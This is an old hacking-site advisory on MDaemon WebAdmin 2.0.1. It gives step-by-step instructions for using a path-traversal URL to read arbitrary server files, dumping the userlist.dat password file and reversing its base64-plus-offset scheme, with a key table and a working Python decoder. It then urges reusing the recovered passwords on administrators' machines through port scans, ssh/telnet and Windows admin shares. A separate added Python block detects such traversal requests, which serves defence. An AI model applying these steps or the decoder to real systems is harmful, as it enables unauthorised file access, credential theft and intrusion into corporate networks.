
How to crack the MDaemon password file manually
Mar, 24 2003 - 14:52
contributed by: hx

Date: 17 March 2003
Subject: Postmaster has access to all files on MDaemon server.
Subject2: How to crack the MDaemon password file manually.
Author: Petur Ingi Egilsson (peter@germy.net)

THIS FAQ MAY NOT BE USED ILLEGALLY.
ALL KNOWLEDGE YOU FIND IN HERE IS FOR DEMO & EDUCATION PURPOSES ONLY.

I recently found a bug in WebAdmin (the Web Administrator plugin for the
MDaemon email environment), which might allow the postmaster of the
mail server to take full control over the whole remote network + the home
computers of all users etc.

Vulnerable systems: MDaemon with WebAdmin 2.0.1. Newer versions have
not been tested.


Fix: has not been released (17 March 2003).


You must have access to WebAdmin with Administrator rights if you wish
to exploit the system.


Description:
WebAdmin runs on a custom version of Apache.
Through it you can edit many of the config files that control the server.

Example: http://SERVER:WEBADMIN-PORT/WebAdmin.dll?Session=SESSION-ID&Theme=Standard&Program=MDaemon&Directory:Name=C%3A%5CMDaemon%5CApp&File:Name=MDAEMON.INI&View=EditFile

This little URL lets you read the MDAEMON.INI file, which is located in
the c:\MDaemon\App\ directory on the server.
You can NOT alter this URL to make WebAdmin read, for example, c:\file.txt,
because the path of the MDaemon.ini config file is a CONSTANT, which means
it is not expected to be renamed or located somewhere else.

However, there are log files! They are often kept in an alternative
location, which means their path may not be held as a CONSTANT!

LOG FILE URL: http://SERVER:WEBADMIN-PORT/WebAdmin.dll?Session=SESSION-ID&Theme=Standard&Program=MDaemon&Directory:Name=C%3A%5CMDaemon%5CLogs&File:Name=AccountPrune.log&View=ViewFile

This means you can change the URL so that you are able to read any
file on the system, as long as it is NOT hidden.

Now, let's change this to: http://SERVER:WEBADMIN-PORT/WebAdmin.dll?Session=SESSION-ID&Theme=Standard&Program=MDaemon&Directory:Name=DIRECTORY&File:Name=FILENAME&View=ViewFile

REMEMBER to change SERVER, WEBADMIN-PORT and SESSION-ID so they
match the ones in your current URL.

Change DIRECTORY to any directory you want.
Here is the format for it:
%3A = :
%5C = \
so c:\dirname\dir2 would be written as c%3A%5Cdirname%5cdir2

Change FILENAME to any file in the chosen directory.



Now, what can be done?
If the server hosts a web page, you can read the .ASP, .PHP and .CGI scripts
behind the page.
If the server has a DATABASE, you can view it as long as it is in text
format!
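A defender's check, added here and not part of the advisory: it URL-decodes the Directory:Name and File:Name parameters (reversing the %3A/%5C encoding described above), normalises the resulting Windows path so any "..\" components collapse, and flags requests that resolve outside the directories WebAdmin is meant to serve. The allowed directories, host name and sample request lines are assumptions constructed for this example.

```python
from urllib.parse import urlsplit, parse_qs
import ntpath

# Directories WebAdmin legitimately serves files from. Assumed install layout,
# taken from the C:\MDaemon\App and C:\MDaemon\Logs paths in the advisory.
ALLOWED_DIRS = (r"c:\mdaemon\app", r"c:\mdaemon\logs")

def requested_path(url):
    """Return the normalised Windows path a WebAdmin.dll request asks for,
    or None when the request carries no Directory:Name/File:Name pair."""
    params = parse_qs(urlsplit(url).query)
    dirs, files = params.get("Directory:Name"), params.get("File:Name")
    if not dirs or not files:
        return None
    # parse_qs has already turned %3A into ':' and %5C/%5c into '\'.
    # normpath collapses '..' components, so a traversal shows up as a path
    # that no longer sits under the directory the request claimed.
    return ntpath.normpath(ntpath.join(dirs[0], files[0]))

def is_outside_allowed(url, allowed=ALLOWED_DIRS):
    """True when the request resolves to a file outside the allowed directories."""
    path = requested_path(url)
    if path is None:
        return False
    folder = ntpath.dirname(path).lower()
    return not any(folder == d or folder.startswith(d + "\\") for d in allowed)

def flag_requests(lines):
    """Run the check over request URLs (one per line) and return the offenders."""
    return [line.strip() for line in lines if is_outside_allowed(line.strip())]

# Constructed sample requests (not real log data); host and session are placeholders.
BASE = ("http://mail.example.test:1000/WebAdmin.dll?Session=SESSION-ID"
        "&Theme=Standard&Program=MDaemon")
SAMPLE_REQUESTS = [
    BASE + "&Directory:Name=C%3A%5CMDaemon%5CApp&File:Name=MDAEMON.INI&View=EditFile",
    BASE + "&Directory:Name=C%3A%5CMDaemon%5CLogs&File:Name=AccountPrune.log&View=ViewFile",
    BASE + "&Directory:Name=C%3A%5CMDaemon%5CLogs%5C..%5C..&File:Name=file.txt&View=ViewFile",
    BASE + "&Directory:Name=c%3A%5Cinetpub%5Cwwwroot&File:Name=login.asp&View=ViewFile",
]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_REQUESTS):
        print("outside allowed directories:", hit)
```

The same normalise-then-compare rule is what WebAdmin itself should have applied server-side before opening the file.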


Now!
What do we wish to do?
Well, all users are dumb and keep the same pass for everything.

Let's move on, and find the MDAEMON password file. Of course it is
encrypted, but let's decrypt and view it!

change DIRECTORY to C%3A%5CMDaemon%5CApp
change FILENAME to userlist.dat

Now you can see a list of all users on the mail server, including their full
name + username + ENCRYPTED PASSWORD.


Let's decrypt the password.


Example: a user has the encrypted password shown as xMnIjdTT
This is a BASE64 encoded password with a 1-byte offset added to each character
of the pass.
Go and find a BASE64 decoder (e.g. http://www.isecurelabs.com/base64.php).

When we DECODE xMnIjdTT we get the bytes <C4><C9><C8><8D><D4><D3> (these are
the HEX values for each character; in the author's character set they display
as ΔΙΘ?ΤΣ, where ? stands for the unprintable byte 8D).
Now, we must remove the 1-byte offset to get the final result.

How to find out what 1-byte offset is used by your version
To remove the 1-byte offset, create a normal email account via WebAdmin and
set the password to "aaaaaaaaaaaaaaa".
Next, view the password file; you should see the encrypted password.
Decrypt it using a Base64 decoder.
Next, find the HEX value for each character in the password, which still
carries the 1-byte offset.
Then use a HEX calculator, enter the HEX value for the char you have, and
do "hex.of.char - 61", as 61 is the HEX code for a normal "a" char. This
leaves you the offset for char nr.1; repeat it until you have found the
offset for all 15 chars in the password.
Then make a list like the one below.

Now, when you have found the offsets, you are ready to decrypt the rest of
the passwords in the file.

Here are the 1-byte offsets for version: MDaemon PRO v6.5.2 R
Char  HEX-Offset
 1    54
 2    68
 3    65
 4    20
 5    73
 6    65
 7    74
 8    75
 9    70
10    20
11    70
12    72
13    6F
14    63

So, char 1 has offset of 54 in HEX!

So, let's move on!

HEX: <C4><C9><C8><8D><D4><D3>
STRING WITH 1-BYTE OFFSET: ΔΙΘ?ΤΣ (? = unprintable byte 8D)

S  -H-  O
Δ  <C4> 54
Ι  <C9> 68
Θ  <C8> 65
?  <8D> 20
Τ  <D4> 73
Σ  <D3> 65
S: string with 1-byte offset
H: character's HEX code
O: character's HEX OFFSET (see the table above, positions 1-14)

Now let's calculate! (All calculations are done with a HEXADECIMAL
CALCULATOR)
S  -H-        O
Δ  C4-54=70  (112 in decimal) = p
Ι  C9-68=61  (97 in decimal)  = a
Θ  C8-65=63  (99 in decimal)  = c
?  8D-20=6D  (109 in decimal) = m
Τ  D4-73=61  (97 in decimal)  = a
Σ  D3-65=6E  (110 in decimal) = n

So, The password is "pacman".
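The arithmetic above in code, added here as an example (not the author's or MDaemon's code) to show why this storage scheme gives no protection: it is a fixed-key additive cipher, so one known plaintext yields the key table and that same key reverses every account in the file. The key bytes are taken from the advisory's offset table for v6.5.2 R; the all-'a' sample value is constructed by the code itself.

```python
import base64

# Per-position key bytes from the advisory's offset table for MDaemon PRO
# v6.5.2 R (positions 1-14); read as ASCII they spell "The setup proc".
# Every stored byte is plaintext byte + key byte at that position.
KEY_V652 = bytes.fromhex("5468652073657475702070726F63")

def encode_password(password, key=KEY_V652):
    """Forward direction of the scheme: add the key byte, then base64."""
    raw = password.encode("latin-1")
    if len(raw) > len(key):
        raise ValueError("password longer than the known key table")
    obf = bytes((p + k) % 256 for p, k in zip(raw, key))
    return base64.b64encode(obf).decode("ascii")

def decode_password(stored_b64, key=KEY_V652):
    """Reverse it: base64-decode, then subtract the key byte at each position."""
    stored = base64.b64decode(stored_b64)
    if len(stored) > len(key):
        raise ValueError("stored value longer than the known key table")
    return bytes((s - k) % 256 for s, k in zip(stored, key)).decode("latin-1")

def recover_key(stored_b64, known_plaintext):
    """Known-plaintext key recovery, the step the advisory performs with an
    account whose password is all 'a': stored minus known leaves the key."""
    stored = base64.b64decode(stored_b64)
    known = known_plaintext.encode("latin-1")
    return bytes((s - p) % 256 for s, p in zip(stored, known))

# Constructed sample: what the file would hold for a 14-character password
# of 'a's under this key (derived here, not copied from a real userlist.dat).
SAMPLE_ALL_A = encode_password("a" * 14)

if __name__ == "__main__":
    print(decode_password("xMnIjdTT"))                # the advisory's example
    print(recover_key(SAMPLE_ALL_A, "a" * 14).hex())  # gives back the key table
```

Because no secret enters the transformation, this is obfuscation rather than encryption; a salted one-way hash would have left nothing for the postmaster to reverse.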


If your password file is large and you crack it, you will get a lot of
passwords from your users.
Who knows what kind of users you have. Administrators in your corporation
who have a lot more access to the network
than you do surely have their little private email account on
the mail server as well. Decrypt their password
and you might have access to the whole corporation network.

As the mail server keeps logs, you will be able to find the users' IP
addresses.
Try port scanning them, and see if you are able to enter their machines
via ssh or telnet, using the user\pass they
used on the mail server. If they have a Windows machine, try \\server-ip\c$
and write Administrator as username, then
write their password as password.
If you want access to their files and folders on the corporation server,
write \\server-ip\ and then enter the same user\pass as they use on the
mail server.

-from MDaemon


The content on this site is (c) by particular authors and the New Order (neworder.box.sk) team.